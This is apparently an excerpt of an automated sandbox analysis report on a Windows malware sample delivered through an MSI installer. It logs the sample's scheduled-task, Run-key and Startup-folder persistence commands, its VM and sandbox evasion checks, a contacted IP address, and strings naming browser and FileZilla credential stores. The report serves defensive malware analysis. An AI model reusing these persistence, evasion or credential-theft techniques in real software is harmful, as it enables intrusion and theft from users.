              Source: C:\Users\user\AppData\Roaming\Windata\SRACMB.exe | Section loaded: propsys.dll
              Source: C:\Windows\Installer\MSI4976.tmp | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
              Source: VYZSPQ.lnk.3.dr | LNK file: ..\..\..\..\..\Windata\SRACMB.exe
              Source: C:\Windows\Installer\MSI4976.tmp | Code function: 3_2_0048B0C0 EntryPoint,LoadLibraryA,GetProcAddress,ExitProcess,VirtualProtect,VirtualProtect,VirtualProtect, 3_2_0048B0C0
              Source: C:\Windows\Installer\MSI4976.tmp | Code function: 3_2_00328D99 push edi; retn 0000h 3_2_00328D9B
              Source: C:\Windows\Installer\MSI4976.tmp | Code function: 3_2_00328F0E push F7FFFFFFh; retn 0000h 3_2_00328F13
              Source: C:\Windows\Installer\MSI4976.tmp | Code function: 3_2_00347795 push ecx; ret 3_2_003477A8
              Source: C:\Users\user\AppData\Roaming\Windata\SRACMB.exe | Code function: 8_2_000B8D99 push edi; retn 0000h 8_2_000B8D9B
              Source: C:\Users\user\AppData\Roaming\Windata\SRACMB.exe | Code function: 8_2_000B8F0E push F7FFFFFFh; retn 0000h 8_2_000B8F13
              Source: C:\Users\user\AppData\Roaming\Windata\SRACMB.exe | Code function: 8_2_000D7795 push ecx; ret 8_2_000D77A8
              Source: initial sample | Static PE information: section name: UPX0
              Source: initial sample | Static PE information: section name: UPX1

              Persistence and Installation Behavior

              Source: C:\Windows\System32\msiexec.exe | Executable created and started: C:\Windows\Installer\MSI4976.tmp
              Source: C:\Windows\Installer\MSI4976.tmp | File created: C:\Users\user\AppData\Roaming\Windata\SRACMB.exe
              Source: C:\Windows\System32\msiexec.exe | File created: C:\Windows\Installer\MSI4976.tmp

              Boot Survival

              Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn VYZSPQ.exe /tr C:\Users\user\AppData\Roaming\Windata\SRACMB.exe /sc minute /mo 1
              Source: C:\Windows\Installer\MSI4976.tmp | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\VYZSPQ.lnk
              Source: C:\Windows\Installer\MSI4976.tmp | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run VYZSPQ
              Source: C:\Windows\Installer\MSI4976.tmp | Code function: 3_2_0033F78E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput, 3_2_0033F78E
              Source: C:\Windows\Installer\MSI4976.tmp | Code function: 3_2_00387F0E IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed, 3_2_00387F0E
              Source: C:\Users\user\AppData\Roaming\Windata\SRACMB.exe | Code function: 8_2_000CF78E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput, 8_2_000CF78E
              Source: C:\Users\user\AppData\Roaming\Windata\SRACMB.exe | Code function: 8_2_00117F0E IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed, 8_2_00117F0E
              Source: C:\Windows\Installer\MSI4976.tmp | Code function: 3_2_00341E5A __initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 3_2_00341E5A
              Source: C:\Windows\System32\msiexec.exe | Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\msiexec.exe | Process information set: NOGPFAULTERRORBOX
              Source: C:\Windows\Installer\MSI4976.tmp | Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Installer\MSI4976.tmp | Process information set: NOGPFAULTERRORBOX
              Source: C:\Windows\SysWOW64\cmd.exe | Process information set: NOGPFAULTERRORBOX
              Source: C:\Windows\System32\conhost.exe | Process information set: NOGPFAULTERRORBOX
              Source: C:\Windows\SysWOW64\wscript.exe | Process information set: NOGPFAULTERRORBOX
              Source: C:\Windows\SysWOW64\wscript.exe | Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\wscript.exe | Process information set: NOGPFAULTERRORBOX
              Source: C:\Windows\SysWOW64\wscript.exe | Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\wscript.exe | Process information set: NOGPFAULTERRORBOX
              Source: C:\Windows\SysWOW64\schtasks.exe | Process information set: NOGPFAULTERRORBOX
              Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOGPFAULTERRORBOXJump to behavior

              Malware Analysis System Evasion

              Source: C:\Users\user\AppData\Roaming\Windata\SRACMB.exe | Sandbox detection routine: GetForegroundWindow, DecisionNode, Sleep
              Source: C:\Windows\SysWOW64\wscript.exe | Window found: window name: WSH-Timer
              Source: C:\Windows\Installer\MSI4976.tmp | Window / User API: threadDelayed 5384
              Source: C:\Windows\Installer\MSI4976.tmp | Window / User API: foregroundWindowGot 1318
              Source: C:\Users\user\AppData\Roaming\Windata\SRACMB.exe | Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess
              Source: C:\Windows\Installer\MSI4976.tmp | API coverage: 6.7 %
              Source: C:\Users\user\AppData\Roaming\Windata\SRACMB.exe | API coverage: 5.3 %
              Source: C:\Windows\Installer\MSI4976.tmp TID: 7768 | Thread sleep time: -53840s >= -30000s
              Source: C:\Windows\Installer\MSI4976.tmp | Last function: Thread delayed
              Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
              Source: C:\Windows\Installer\MSI4976.tmp | Thread sleep count: Count: 5384 delay: -10
              Source: Yara match | File source: 00000006.00000002.2614707550.0000000003830000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000006.00000002.2614274905.00000000032A7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000003.00000002.2616737221.0000000004AC6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000006.00000002.2614274905.00000000032C7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: Process Memory Space: MSI4976.tmp PID: 7764, type: MEMORYSTR
              Source: Yara match | File source: Process Memory Space: wscript.exe PID: 7852, type: MEMORYSTR
              Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\VYZSPQ.vbs, type: DROPPED
              Source: C:\Windows\System32\msiexec.exe | File Volume queried: C:\ FullSizeInformation
              Source: C:\Windows\System32\msiexec.exe | File Volume queried: C:\ FullSizeInformation
              Source: C:\Windows\System32\msiexec.exe | File Volume queried: C:\ FullSizeInformation
              Source: C:\Windows\System32\msiexec.exe | File Volume queried: C:\ FullSizeInformation
              Source: C:\Windows\System32\msiexec.exe | File Volume queried: C:\ FullSizeInformation
              Source: C:\Windows\System32\msiexec.exe | File Volume queried: C:\ FullSizeInformation
              Source: C:\Windows\System32\msiexec.exe | File Volume queried: C:\ FullSizeInformation
              Source: C:\Windows\Installer\MSI4976.tmp | Code function: 3_2_0033DD92 GetFileAttributesW,FindFirstFileW,FindClose
              Source: C:\Windows\Installer\MSI4976.tmp | Code function: 3_2_00372044 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
              Source: C:\Windows\Installer\MSI4976.tmp | Code function: 3_2_0037219F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
              Source: C:\Windows\Installer\MSI4976.tmp | Code function: 3_2_003724A9 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose
              Source: C:\Windows\Installer\MSI4976.tmp | Code function: 3_2_00366B3F _wcscat,_wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose
              Source: C:\Windows\Installer\MSI4976.tmp | Code function: 3_2_00366E4A _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose
              Source: C:\Windows\Installer\MSI4976.tmp | Code function: 3_2_0036F350 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose
              Source: C:\Windows\Installer\MSI4976.tmp | Code function: 3_2_0036FD47 FindFirstFileW,FindClose
              Source: C:\Windows\Installer\MSI4976.tmp | Code function: 3_2_0036FDD2 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf
              Source: C:\Users\user\AppData\Roaming\Windata\SRACMB.exe | Code function: 8_2_00102044 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
              Source: C:\Users\user\AppData\Roaming\Windata\SRACMB.exe | Code function: 8_2_0010219F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
              Source: C:\Users\user\AppData\Roaming\Windata\SRACMB.exe | Code function: 8_2_001024A9 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose
              Source: C:\Users\user\AppData\Roaming\Windata\SRACMB.exe | Code function: 8_2_000F6B3F _wcscat,_wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose
              Source: C:\Users\user\AppData\Roaming\Windata\SRACMB.exe | Code function: 8_2_000F6E4A _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose
              Source: C:\Users\user\AppData\Roaming\Windata\SRACMB.exe | Code function: 8_2_000FF350 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose
              Source: C:\Users\user\AppData\Roaming\Windata\SRACMB.exe | Code function: 8_2_000FFD47 FindFirstFileW,FindClose
              Source: C:\Users\user\AppData\Roaming\Windata\SRACMB.exe | Code function: 8_2_000CDD92 GetFileAttributesW,FindFirstFileW,FindClose
              Source: C:\Users\user\AppData\Roaming\Windata\SRACMB.exe | Code function: 8_2_000FFDD2 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf
              Source: C:\Windows\Installer\MSI4976.tmp | Code function: 3_2_0033E47B GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo
              Source: MSI4976.tmp, 00000003.00000003.1372438000.0000000001928000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\
              Source: MSI4976.tmp, 00000003.00000002.2615051893.0000000001822000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
              Source: SRACMB.exe, 0000000F.00000003.1692703031.0000000001825000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: od_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\
              Source: MSI4976.tmp, 00000003.00000002.2615051893.0000000001822000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
              Source: C:\Windows\Installer\MSI4976.tmp | API call chain: ExitProcess graph end node
              Source: C:\Windows\Installer\MSI4976.tmp | API call chain: ExitProcess graph end node
              Source: C:\Windows\Installer\MSI4976.tmp | API call chain: ExitProcess graph end node
              Source: C:\Users\user\AppData\Roaming\Windata\SRACMB.exe | API call chain: ExitProcess graph end node
              Source: C:\Users\user\AppData\Roaming\Windata\SRACMB.exe | API call chain: ExitProcess graph end node
              Source: C:\Windows\System32\msiexec.exe | Process information queried: ProcessInformation
              Source: C:\Windows\Installer\MSI4976.tmp | Code function: 3_2_0037703C BlockInput
              Source: C:\Windows\Installer\MSI4976.tmp | Code function: 3_2_0032374E GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW
              Source: C:\Windows\Installer\MSI4976.tmp | Code function: 3_2_003546D0 LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,IsDebuggerPresent,OutputDebugStringW
              Source: C:\Windows\Installer\MSI4976.tmp | Code function: 3_2_0048B0C0 EntryPoint,LoadLibraryA,GetProcAddress,ExitProcess,VirtualProtect,VirtualProtect,VirtualProtect
              Source: C:\Windows\Installer\MSI4976.tmp | Code function: 3_2_0034A937 GetProcessHeap
              Source: C:\Windows\Installer\MSI4976.tmp | Code function: 3_2_00348E3C SetUnhandledExceptionFilter,UnhandledExceptionFilter
              Source: C:\Windows\Installer\MSI4976.tmp | Code function: 3_2_00348E19 SetUnhandledExceptionFilter
              Source: C:\Users\user\AppData\Roaming\Windata\SRACMB.exe | Code function: 8_2_000D8E19 SetUnhandledExceptionFilter
              Source: C:\Users\user\AppData\Roaming\Windata\SRACMB.exe | Code function: 8_2_000D8E3C SetUnhandledExceptionFilter,UnhandledExceptionFilter
              Source: C:\Windows\Installer\MSI4976.tmp | Code function: 3_2_0035BE95 LogonUserW
              Source: C:\Windows\Installer\MSI4976.tmp | Code function: 3_2_0032374E GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: winmgmts:\\localhost\root\securitycenter2sracmb.exen dos@
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: r=#]m
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: crlfp
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: errorh
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: errorm
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: v,ns
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: t,ls!
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: z,bs"
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: x,@s#
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: ^,fs$
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \,ds%
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: b,zs&
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: `,xs'
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: f,^s(
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: d,\s)
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: j,rs*
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: h,ps+
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: n,vs,
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: l,ts-
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: v.nu
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: t.lu!
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: z.bu"
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: x.@u#
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: ^.fu$
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \.du%
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: b.zu&
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: `.xu'
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: f.^u(
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: d.\u)
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: j.ru*
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: h.pu+
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: n.vu,
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: l.tu-
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: v(nw
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: t(lw!
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: z(bw"
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: x(@w#
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: ^(fw$
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \(dw%
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: b(zw&
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: `(xw'
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: f(^w(
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: d(\w)
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: j(rw*
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: h(pw+
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: n(vw,
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: l(tw-
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: 951l227301938l227301939l227301924l
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: 227301908l227301909l227301924l227301935l227301926l227301922l227301913l227301926l227301939l227301944l227301911l227301946l227301937l227301945l227301924l227301951l227301922l227301950l227301947l227301894l227301924l227301945l227301920l227301951l227301938l227301939l227301924
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: dword version;dword formatc;ptr formats;
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: an unrecognized variable type was encountered in p8de3eo0u() (
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: 227301893l227301922l227301924l227301951l227301944l227301937
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: c:\users\user\appdata\roaming\microsoft\windows\libraries
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: c:\programdata\microsoft\windows\start menu\programs\startup
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: 172.111.138.100
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: ulong dwminlength;ulong dwmaxlength;ulong dwincrement;f.dll
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: c:\users\user\appdata\roaming\opera software\opera stable\
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: =9ncalrpc:[epmapper,security=impersonation dynamic false]
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: jc:\users\user\appdata\roaming\windata9v
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: c:\users\user\appdata\local\microsoft\edge\user data\default\
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: c:\users\user\appdata\local\google\chrome\user data\default\(
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: 227301950l227301943l227301944l227301938l227301946l227301939j$
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: dword cbsize;dword dwpromptflags;hwnd hwndapp;ptr szprompt;y$
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: c1./c1./c1./c1./c1./c1./c1./c1./c1./c1./c1./c1./c1./c1./c1./c1./c1./c1./c1./c1./c1./c1./c1./c1./c1./c1./c1./c1./c1./c1./,$
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: c:\users\user\appdata\roaming\filezilla\recentservers.xml
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: <%(z-
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: ?'*xm
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: crlf(
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: <!+z8
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: crlfh
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: ?"*]m
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: ?=*^m
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: c<?+p
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: crlf@8
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: ?8*sm
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: ocalh
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: ?;*tm
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: v3epick323l227301938l22
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: 02006l227301938l227301943l0
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: 7301922l227301943l22730200h
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: 227301925l227301923l227301
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: 6l227301926l227301946l2273
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: 951l227301939l227301938l22
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: 02006l227301922l227301945l
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: 944l227301941l227301
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: 01951l227301945l227301944l227302008d
